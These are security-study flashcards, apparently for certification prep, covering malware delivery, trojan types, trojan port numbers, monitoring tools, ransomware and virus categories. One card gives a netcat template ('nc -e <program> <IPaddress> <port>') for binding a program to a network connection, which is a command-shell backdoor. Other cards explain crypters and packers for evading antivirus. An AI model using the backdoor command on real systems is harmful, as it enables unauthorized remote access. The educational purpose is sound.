Trojans and other Attacks Flashcards
Malware
Software designed to harm or secretly access a computer system without the owner's informed consent. Also called a computer contaminant.
Malvertising
Embedding malware into ad networks
Malware Delivery
Downloaded from the Internet
Drive-by downloading
Hijacking of peer-to-peer applications
Email attachment
Overt Channels
Legitimate communication channels
Covert Channels
Used to transport data in unintended ways
Wrappers
Programs that allow you to bind a trojan to an innocent file
Crypters
Software tools that use a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products. FUD: fully undetectable.
Packers
Use compression to pack the malware executable, making it harder for antivirus engines to detect. Extraction occurs in memory and not on disk.
Trojan Exploit Kits
Infinity
Bleeding Life
Crimepack
Blackhole Exploit Kit
Trojan
Embedded malicious code in an otherwise normal application
Types of Trojans
Defacement trojan
Proxy server trojan
Botnet trojan (Tor-based Chewbacca and Skynet)
Remote Access trojan (RAT: MoSucker, Optix Pro, Blackhole)
E-banking trojan (Zeus, SpyEye)
Covert Channel Tunneling Trojan (CCTT)
A form of remote access trojan that uses a variety of exploitation techniques to create data transfer channels in previously authorized data streams. Designed to provide an external shell from within the internal environment.
Command shell trojan
Provides a backdoor to the system that you connect to via command-line access. Netcat example: nc -e <program> <IPaddress> <port> (the -e option names the program whose input and output are bound to the connection)
The -t option answers Telnet negotiation, giving a telnet-like session
Example: nc -l -p 5555 opens a port in a listening state, and nc <IPaddress> 5555 connects to the target machine with a telnet-like connection
Netcat can be used for outbound or inbound connections over TCP or UDP, to or from any port on the machine. It offers DNS forwarding, port mapping, forwarding and proxying. It can also be used as a port scanner.
Trojan Ports
Death: 2
Senna Spy: 20
Hackers Paradise: 31, 456
TCP Wrappers: 421
Doom, Satanz Backdoor: 666
Silencer, WebEx: 1001
RAT: 1095-1098
SubSeven: 1243
Shivka-Burka: 1600
Trojan Cow: 2001
Deep Throat: 6670-6671
Tini: 7777
NetBus: 12345, 12346
Whack-a-Mole: 12361-12363
Back Orifice: 31337, 31338
Use netstat -an to monitor listening ports; netstat -b displays all active connections and the processes using them
Neverquest Trojan
Targets banking websites. Designed to steal credentials and sensitive information and to set up VNC remote access to targets.
Port monitoring tools
Fport - shows the same info as netstat -an but also maps ports to running processes and PIDs
What's Running
TCPView
IceSword
CurrPorts
Process Explorer
Registry monitoring tools
SysAnalyzer, Tiny Watcher, Active Registry Monitor, Regshot, Malwarebytes
Service monitoring
Windows Service Manager
Service Manager Plus
Smart Utility
Verifying the integrity of system files (can act as a HIDS for trojans)
Tripwire
Sigverif - creates c:\windows\system32\sigverif.txt
Virus
Self-replicating program that reproduces its code by attaching copies of itself to other executable code
Can be distributed through virus hoaxes and fake antivirus programs
Ransomware
Malicious software designed to deny access to a computer until a ransom is paid
Wannacry
Ransomware that took advantage of an unpatched SMBv1 vulnerability through the exploit known as EternalBlue
Ransomware programs
Cryptorbit
Cryptolocker
CryptoDefense
Boot sector virus
Also known as a system virus, this virus type actually moves the boot sector to another location on the hard drive, forcing the virus code to be executed first
Petya ransomware overwrote the master boot record
Shell virus
Wraps itself around an application’s code, inserting its own code before the application’s
Cluster virus
Modifies directory table entries so that user or system processes are pointed to the virus code itself instead of the application
Multipartite virus
Attempts to infect both files and the boot sector at the same time; the term refers to a virus with multiple infection vectors.
Macro virus
Usually written in Visual Basic for Applications (VBA); infects template files created by Microsoft Office apps. The Melissa virus was a macro virus.
Polymorphic code virus
Mutates its code using a built-in polymorphic engine. Difficult to find and remove because its signature constantly changes.
Encryption virus
Uses encryption to hide the code from antivirus scanners